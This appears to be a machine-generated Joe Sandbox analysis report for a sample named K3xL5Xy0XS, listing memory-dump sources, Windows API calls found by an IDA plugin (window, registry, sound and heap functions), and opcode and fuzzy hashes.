                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 2598888154-3887548279
                                                                                  • Opcode ID: 38f2de3f0c0288dd01083b0fc1daa6559fd9267bdc422ff3716df3f81347006e
                                                                                  • Instruction ID: a828f2aa0ad375b28ffd7e3f2c16521e694235027ece6e551feec4be409db38b
                                                                                  • Opcode Fuzzy Hash: 38f2de3f0c0288dd01083b0fc1daa6559fd9267bdc422ff3716df3f81347006e
                                                                                  • Instruction Fuzzy Hash: 1F61E375D10319EFCF04CFA5D884AAEBBB9FF48310F208529E959A7250E770A951CF54
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 001FDAA1
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD659
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD66B
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD67D
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD68F
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6A1
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6B3
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6C5
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6D7
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6E9
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6FB
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD70D
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD71F
                                                                                    • Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD731
                                                                                  • _free.LIBCMT ref: 001FDA96
                                                                                    • Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
                                                                                    • Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0
                                                                                  • _free.LIBCMT ref: 001FDAB8
                                                                                  • _free.LIBCMT ref: 001FDACD
                                                                                  • _free.LIBCMT ref: 001FDAD8
                                                                                  • _free.LIBCMT ref: 001FDAFA
                                                                                  • _free.LIBCMT ref: 001FDB0D
                                                                                  • _free.LIBCMT ref: 001FDB1B
                                                                                  • _free.LIBCMT ref: 001FDB26
                                                                                  • _free.LIBCMT ref: 001FDB5E
                                                                                  • _free.LIBCMT ref: 001FDB65
                                                                                  • _free.LIBCMT ref: 001FDB82
                                                                                  • _free.LIBCMT ref: 001FDB9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  • Opcode ID: f4a781962254e8d470a9697cb65eab4ad10483eb9378b98c7c84416d453bf770
                                                                                  • Instruction ID: b1e91b62623570889ec77d95fbc474dc61d1d001b9c72205d37877b4f1a35010
                                                                                  • Opcode Fuzzy Hash: f4a781962254e8d470a9697cb65eab4ad10483eb9378b98c7c84416d453bf770
                                                                                  • Instruction Fuzzy Hash: 4F315A31644A0E9FEB22AE38F845B7A77EAFF21315F114519E648D7191DF71EC408724
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0022369C
                                                                                  • _wcslen.LIBCMT ref: 002236A7
                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00223797
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0022380C
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0022385D
                                                                                  • GetWindowRect.USER32(?,?), ref: 00223882
                                                                                  • GetParent.USER32(?), ref: 002238A0
                                                                                  • ScreenToClient.USER32(00000000), ref: 002238A7
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00223921
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0022395D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                  • String ID: %s%u
                                                                                  • API String ID: 4010501982-679674701
                                                                                  • Opcode ID: b70bb6b213dccc891530f6bdfa1df374818cadd4292e07e5104090bb7ee6363d
                                                                                  • Instruction ID: 2d810f4436004166c374df78b3d50c551929dec031032f7ac755cc0bb0018aaf
                                                                                  • Opcode Fuzzy Hash: b70bb6b213dccc891530f6bdfa1df374818cadd4292e07e5104090bb7ee6363d
                                                                                  • Instruction Fuzzy Hash: 6691D071214717BFD708DFA4E884BAAF7A9FF44310F008529F999C6190EB34EA65CB91
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00224994
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 002249DA
                                                                                  • _wcslen.LIBCMT ref: 002249EB
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 002249F7
                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00224A2C
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00224A64
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00224A9D
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00224AE6
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00224B20
                                                                                  • GetWindowRect.USER32(?,?), ref: 00224B8B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                  • String ID: ThumbnailClass
                                                                                  • API String ID: 1311036022-1241985126
                                                                                  • Opcode ID: b756b2712fb0c9a2f23b024fec673140fe70f2b88c021ec6606ffef9991460b7
                                                                                  • Instruction ID: e5c220612219a675abaebeb6831b5f7eadfa9180672c6da3e76843851e77030f
                                                                                  • Opcode Fuzzy Hash: b756b2712fb0c9a2f23b024fec673140fe70f2b88c021ec6606ffef9991460b7
                                                                                  • Instruction Fuzzy Hash: EE911631414316AFDB04EF94E885FAA77E8FF84318F04446AFD859A096EB30ED55CBA1
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0024CC64
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0024CC8D
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0024CD48
                                                                                    • Part of subcall function 0024CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0024CCAA
                                                                                    • Part of subcall function 0024CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0024CCBD
                                                                                    • Part of subcall function 0024CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0024CCCF
                                                                                    • Part of subcall function 0024CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0024CD05
                                                                                    • Part of subcall function 0024CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0024CD28
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0024CCF3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2734957052-4033151799
                                                                                  • Opcode ID: 249b6e97da98eca11c7a37cdfe911d677c1df5232597a3a1b9b10db927f4e0bd
                                                                                  • Instruction ID: 4c90b3bfb4cd2b4199c68ffe1da0e64d8af3f16428904d66afa32b6d63ff8aae
                                                                                  • Opcode Fuzzy Hash: 249b6e97da98eca11c7a37cdfe911d677c1df5232597a3a1b9b10db927f4e0bd
                                                                                  • Instruction Fuzzy Hash: BC31AE71912229BFDB248F58DC8CEFFBB7CEF01750F200065A906E2250EA708A45DAA4
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00233D40
                                                                                  • _wcslen.LIBCMT ref: 00233D6D
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00233D9D
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00233DBE
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00233DCE
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00233E55
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00233E60
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00233E6B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                  • String ID: :$\$\??\%s
                                                                                  • API String ID: 1149970189-3457252023
                                                                                  • Opcode ID: 8040a79cf0df950f45e349d5503c3f766f95976fe22ea3eabb3458cc88e12f08
                                                                                  • Instruction ID: 8e93bbf84c04bcd595fd3e9434dfff0a61f4b61ad48505c18f2c8ab22053a52f
                                                                                  • Opcode Fuzzy Hash: 8040a79cf0df950f45e349d5503c3f766f95976fe22ea3eabb3458cc88e12f08
                                                                                  • Instruction Fuzzy Hash: 7831A3B591020AABDB21DFA0DC49FEF37BCEF89701F1040A6F509D6050E77097948B24
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 0022E6B4
                                                                                    • Part of subcall function 001DE551: timeGetTime.WINMM(?,?,0022E6D4), ref: 001DE555
                                                                                  • Sleep.KERNEL32(0000000A), ref: 0022E6E1
                                                                                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0022E705
                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0022E727
                                                                                  • SetActiveWindow.USER32 ref: 0022E746
                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0022E754
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0022E773
                                                                                  • Sleep.KERNEL32(000000FA), ref: 0022E77E
                                                                                  • IsWindow.USER32 ref: 0022E78A
                                                                                  • EndDialog.USER32(00000000), ref: 0022E79B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                  • String ID: BUTTON
                                                                                  • API String ID: 1194449130-3405671355
                                                                                  • Opcode ID: 37e9ddc1c7df2e605157f756ea9f069f1f532035b07f5dc1d2089959e01037a2
                                                                                  • Instruction ID: 20a5b3706b05741a48bd9716f1cbcf77b0827e6e389acb76f765ec828ff2f95c
                                                                                  • Opcode Fuzzy Hash: 37e9ddc1c7df2e605157f756ea9f069f1f532035b07f5dc1d2089959e01037a2
                                                                                  • Instruction Fuzzy Hash: AB21C6B0214311FFEF005FA0FC8DA357B6DF75534AF210426F506816A2EB75AC249B28
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0022EA5D
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0022EA73
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022EA84
                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0022EA96
                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0022EAA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$_wcslen
                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                  • API String ID: 2420728520-1007645807
                                                                                  • Opcode ID: 00073ad8ed8cbc79260954f91119f3151652070858dbbdcbaa4ec0efe6660da3
                                                                                  • Instruction ID: 60d9876d8fd9a21164dcd8ee08b602634c8987edabec742203c57f513b06b9fe
                                                                                  • Opcode Fuzzy Hash: 00073ad8ed8cbc79260954f91119f3151652070858dbbdcbaa4ec0efe6660da3
                                                                                  • Instruction Fuzzy Hash: E3113335A6126979DB20B7A1EC5EEFF6A7CFBE2B00F400429B411A24D1EFB05955C6B0
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00225CE2
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00225CFB
                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00225D59
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00225D69
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00225D7B
                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00225DCF
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00225DDD
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00225DEF
                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00225E31
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00225E44
                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00225E5A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00225E67
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                  • String ID:
                                                                                  • API String ID: 3096461208-0
                                                                                  • Opcode ID: 0b25cf23a8cd589389b4b92be827dde404a3198c7ddaf4916e5dbafe69024923
                                                                                  • Instruction ID: 7e0ef2be88861df5869c5899ad75ab9620daf03f57e68948c302e27bcd595d21
                                                                                  • Opcode Fuzzy Hash: 0b25cf23a8cd589389b4b92be827dde404a3198c7ddaf4916e5dbafe69024923
                                                                                  • Instruction Fuzzy Hash: D7512F71A10715BFDB18CFA8DD89AAEBBB9FB48311F208129F515E6294D7709E10CB50
                                                                                  APIs
                                                                                    • Part of subcall function 001D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D8BE8,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 001D8FC5
                                                                                  • DestroyWindow.USER32(?), ref: 001D8C81
                                                                                  • KillTimer.USER32(00000000,?,?,?,?,001D8BBA,00000000,?), ref: 001D8D1B
                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00216973
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 002169A1
                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 002169B8
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001D8BBA,00000000), ref: 002169D4
                                                                                  • DeleteObject.GDI32(00000000), ref: 002169E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 641708696-0
                                                                                  • Opcode ID: ee38feb0a86c9af245b9a1fdf463308e77f2d8e57ac9d086f1d3f7109f7c4d82
                                                                                  • Instruction ID: bb4f15c17b130a833271c19778355e5b73965d25b1beab216c6a774d92add181
                                                                                  • Opcode Fuzzy Hash: ee38feb0a86c9af245b9a1fdf463308e77f2d8e57ac9d086f1d3f7109f7c4d82
                                                                                  • Instruction Fuzzy Hash: 6D617B31522702DFDB259F15E94CBA9B7F1FF50316F24451AE0429BAA0CB31A9A0DFA4
                                                                                  APIs
                                                                                    • Part of subcall function 001D9944: GetWindowLongW.USER32(?,000000EB), ref: 001D9952
                                                                                  • GetSysColor.USER32(0000000F), ref: 001D9862
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 259745315-0
                                                                                  • Opcode ID: 98af6c131fd9aadf66a06846a86e604b5ac61701fcd18a3a8d53792ad2dc9ee9
                                                                                  • Instruction ID: 7f1cb027f3941a765c679421fef17a1df2b71bea5c5c61cd2eb826c03a69eace
                                                                                  • Opcode Fuzzy Hash: 98af6c131fd9aadf66a06846a86e604b5ac61701fcd18a3a8d53792ad2dc9ee9
                                                                                  • Instruction Fuzzy Hash: 4C41E631104744AFDF245F38AC88BB93BB6EB56732F244606F9A6872E1D7309C41EB10
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0020F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00229717
                                                                                  • LoadStringW.USER32(00000000,?,0020F7F8,00000001), ref: 00229720
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0020F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00229742
                                                                                  • LoadStringW.USER32(00000000,?,0020F7F8,00000001), ref: 00229745
                                                                                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00229866
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                  • API String ID: 747408836-2268648507
                                                                                  • Opcode ID: 4f7878508f0ded36aeba9c8d2d18d4ed31ed5ad691e44b6730d0628db510a57d
                                                                                  • Instruction ID: 9cf56abd0e03e2f107dbd2d30926c3fba132eb0510bc68dcccb6c5e36109508f
                                                                                  • Opcode Fuzzy Hash: 4f7878508f0ded36aeba9c8d2d18d4ed31ed5ad691e44b6730d0628db510a57d
                                                                                  • Instruction Fuzzy Hash: D1414172900219BADB14FBE0ED4AEEE7378AF25340F500169F50572092EB35AF58CB61
                                                                                  APIs
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002207A2
                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002207BE
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002207DA
                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00220804
                                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0022082C
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00220837
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0022083C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
